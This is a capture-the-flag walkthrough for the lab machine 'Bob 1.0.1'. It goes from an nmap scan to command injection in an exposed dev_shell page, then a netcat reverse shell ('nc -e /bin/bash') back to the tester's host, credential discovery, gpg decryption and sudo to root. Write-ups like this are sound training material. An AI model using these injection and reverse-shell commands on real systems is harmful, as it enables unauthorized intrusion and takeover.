Bob 1.0.1
Bob 1.0.1
Enumeration
nmap
nmap -sC -sV -oA nmap/Bob 192.168.1.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 22:59 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.1.112
Host is up (0.00014s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:3B:96:26 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.57 seconds
We see that there is only port 80 open and some disallow entries
Let's put it at the browser see what we got

Got this.
Exploitation
Then I navigate to /dev_shell.php

Got this shell, tried ping 192.168.1.113
and ; ping 102.168.1.113
and got this error

After a few tries, found out id can be used, so I went to try to set up a listener

Reverse Shell
At our machine, type
nc -nlvp 4444
At the dev_shell
, type
id | nc -e /bin/bash 192.168.1.113 4444
Then we will receive a shell, from there, type
python -c 'import pty; pty.spawn("/bin/bash")'

Then navigate to the /home directory and we will see 4 directory bob
, elliot
, jc
and seb

I first went to the elliot directory and saw a file called theadminisdumb.txt

After cat
the file

We can see that there is a password Qwerty
for a user, after su
to other 3 users, we know that the user is for jc
. The password theadminisdumb
is for elliot
.
su
into elliot

I can't find anything on those users, so I went to bob user to find any interesting, after looking around I navigate to /Documents
and saw 2 text files and a directory

Going inside the /Secret/Keep_out/Not_Porn/No_Lookie_In_Here
, there is a notes.sh

Cat
the file, after that the first character of each sentence is HARPOCRATES, it must be indicates a password

I went back tot he Document
directory

We can see there is a login.txt.gpg, use the string we got just now we might decrypt the file.
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

We can see that a credentials has been decrypted! and it is bob
credentials
Privilege Escalation
Lets su
into bob

type sudo -l

We can see it has sudo rights for this user
type sudo bash
and we will get root

type /flag.txt
and we will get the flag

Congratulation!
Last updated
Was this helpful?